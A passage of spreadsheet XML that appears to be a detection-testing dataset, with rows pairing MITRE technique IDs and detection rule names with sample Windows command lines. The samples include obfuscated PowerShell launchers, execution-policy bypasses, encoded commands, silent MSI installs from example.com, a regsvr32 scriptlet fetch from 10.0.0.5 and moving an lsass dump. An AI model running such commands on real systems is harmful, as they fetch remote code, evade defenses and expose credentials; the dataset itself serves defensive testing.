      <c r="H3285" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3285" s="43" t="n"/>
      <c r="J3285" s="43" t="n"/>
      <c r="K3285" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3286" ht="15.75" customHeight="1" s="42">
      <c r="A3286" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3286" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C3286" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D3286" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E3286" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROFIle -"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F3286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3286" s="43" t="n"/>
      <c r="J3286" s="43" t="n"/>
      <c r="K3286" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3287" ht="15.75" customHeight="1" s="42">
      <c r="A3287" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3287" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3287" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3287" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3287" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3287" s="43" t="n"/>
      <c r="J3287" s="43" t="n"/>
      <c r="K3287" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3288" ht="15.75" customHeight="1" s="42">
      <c r="A3288" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3288" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3288" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3288" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3288" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -COMmanD "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3288" s="43" t="n"/>
      <c r="J3288" s="43" t="n"/>
      <c r="K3288" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3289" ht="15.75" customHeight="1" s="42">
      <c r="A3289" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3289" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C3289" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D3289" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E3289" s="43" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -"c" "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3289" s="43" t="n"/>
      <c r="J3289" s="43" t="n"/>
      <c r="K3289" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3290" ht="15.75" customHeight="1" s="42">
      <c r="A3290" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3290" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C3290" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D3290" s="43" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E3290" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set PAYLOAD=Write-Host 'Benign Educational Bypass' &amp; set LAUNCH=powershell.exe -NoP -c "{1}{0}" -f 'st','Te' &amp; %LAUNCH%"</t>
        </is>
      </c>
      <c r="F3290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3290" s="43" t="n"/>
      <c r="J3290" s="43" t="n"/>
      <c r="K3290" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3291" ht="15.75" customHeight="1" s="42">
      <c r="A3291" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3291" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3291" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3291" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3291" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F3291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3291" s="43" t="n"/>
      <c r="J3291" s="43" t="n"/>
      <c r="K3291" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3292" ht="15.75" customHeight="1" s="42">
      <c r="A3292" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3292" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3292" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3292" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3292" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F3292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3292" s="43" t="n"/>
      <c r="J3292" s="43" t="n"/>
      <c r="K3292" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3293" ht="15.75" customHeight="1" s="42">
      <c r="A3293" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3293" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3293" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3293" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3293" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F3293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3293" s="43" t="n"/>
      <c r="J3293" s="43" t="n"/>
      <c r="K3293" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3294" ht="15.75" customHeight="1" s="42">
      <c r="A3294" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3294" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3294" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3294" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3294" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCUTIonPolICy Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F3294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3294" s="43" t="n"/>
      <c r="J3294" s="43" t="n"/>
      <c r="K3294" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3295" ht="15.75" customHeight="1" s="42">
      <c r="A3295" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3295" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3295" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3295" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3295" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F3295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3295" s="43" t="n"/>
      <c r="J3295" s="43" t="n"/>
      <c r="K3295" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3296" ht="15.75" customHeight="1" s="42">
      <c r="A3296" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3296" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3296" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3296" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3296" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F3296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3296" s="43" t="n"/>
      <c r="J3296" s="43" t="n"/>
      <c r="K3296" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3297" ht="15.75" customHeight="1" s="42">
      <c r="A3297" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3297" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3297" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3297" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3297" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F3297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3297" s="43" t="n"/>
      <c r="J3297" s="43" t="n"/>
      <c r="K3297" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3298" ht="15.75" customHeight="1" s="42">
      <c r="A3298" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3298" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3298" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3298" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3298" s="43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98" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3298" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3298" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3298" s="43" t="n"/>
      <c r="J3298" s="43" t="n"/>
      <c r="K3298" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3299" ht="15.75" customHeight="1" s="42">
      <c r="A3299" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3299" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3299" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3299" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3299" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -"W" Hidden -c "$u='htps://[example.com/';$i=New-Object](https://www.google.com/search?q=https://example.com/%27%3B%24i%3DNew-Object) -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'');"</t>
        </is>
      </c>
      <c r="F3299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3299" s="43" t="n"/>
      <c r="J3299" s="43" t="n"/>
      <c r="K3299" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3300" ht="15.75" customHeight="1" s="42">
      <c r="A3300" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3300" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3300" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3300" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3300" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"w" hidden -Command "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('https://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F3300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3300" s="43" t="n"/>
      <c r="J3300" s="43" t="n"/>
      <c r="K3300" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3301" ht="15.75" customHeight="1" s="42">
      <c r="A3301" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3301" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3301" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3301" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3301" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"w" hidden -c "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('https://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F3301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3301" s="43" t="n"/>
      <c r="J3301" s="43" t="n"/>
      <c r="K3301" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3302" ht="15.75" customHeight="1" s="42">
      <c r="A3302" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3302" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3302" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3302" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3302" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -"Command" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3302" s="43" t="n"/>
      <c r="J3302" s="43" t="n"/>
      <c r="K3302" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3303" ht="15.75" customHeight="1" s="42">
      <c r="A3303" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3303" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3303" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3303" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3303" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F3303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3303" s="43" t="n"/>
      <c r="J3303" s="43" t="n"/>
      <c r="K3303" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3304" ht="15.75" customHeight="1" s="42">
      <c r="A3304" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3304" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3304" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3304" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3304" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F3304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3304" s="43" t="n"/>
      <c r="J3304" s="43" t="n"/>
      <c r="K3304" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3305" ht="15.75" customHeight="1" s="42">
      <c r="A3305" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3305" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3305" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3305" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3305" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F3305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3305" s="43" t="n"/>
      <c r="J3305" s="43" t="n"/>
      <c r="K3305" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3306" ht="15.75" customHeight="1" s="42">
      <c r="A3306" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3306" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_pingcastle</t>
        </is>
      </c>
      <c r="C3306" s="43" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution</t>
        </is>
      </c>
      <c r="D3306" s="43" t="inlineStr">
        <is>
          <t>2433a154-bb3d-42e4-86c3-a26bdac91c45</t>
        </is>
      </c>
      <c r="E3306" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "audit_tool.exe --s^canner a^clcheck"</t>
        </is>
      </c>
      <c r="F3306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3306" s="43" t="n"/>
      <c r="J3306" s="43" t="n"/>
      <c r="K3306" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3307" ht="15.75" customHeight="1" s="42">
      <c r="A3307" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3307" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3307" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3307" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3307" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F3307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3307" s="43" t="n"/>
      <c r="J3307" s="43" t="n"/>
      <c r="K3307" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3308" ht="15.75" customHeight="1" s="42">
      <c r="A3308" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B3308" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C3308" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D3308" s="43" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E3308" s="43" t="inlineStr">
        <is>
          <t>copy certutil.exe totallynotcertutil.exe &amp; totallynotcertutil.exe -encode input.txt output.txt</t>
        </is>
      </c>
      <c r="F3308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3308" s="43" t="n"/>
      <c r="J3308" s="43" t="n"/>
      <c r="K3308" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3309" ht="15.75" customHeight="1" s="42">
      <c r="A3309" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3309" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C3309" s="43" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D3309" s="43" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E3309" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\svchost.exe"</t>
        </is>
      </c>
      <c r="F3309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3309" s="43" t="n"/>
      <c r="J3309" s="43" t="n"/>
      <c r="K3309" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3310" ht="15.75" customHeight="1" s="42">
      <c r="A3310" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B3310" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C3310" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D3310" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E3310" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F3310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3310" s="43" t="n"/>
      <c r="J3310" s="43" t="n"/>
      <c r="K3310" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3311" ht="15.75" customHeight="1" s="42">
      <c r="A3311" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3311" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3311" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3311" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3311" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wmic.exe -"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F3311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3311" s="43" t="n"/>
      <c r="J3311" s="43" t="n"/>
      <c r="K3311" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3312" ht="15.75" customHeight="1" s="42">
      <c r="A3312" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B3312" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3312" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3312" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3312" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wmic.exe /noDe:LOCALhosT process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F3312" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3312" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3312" s="43" t="b">
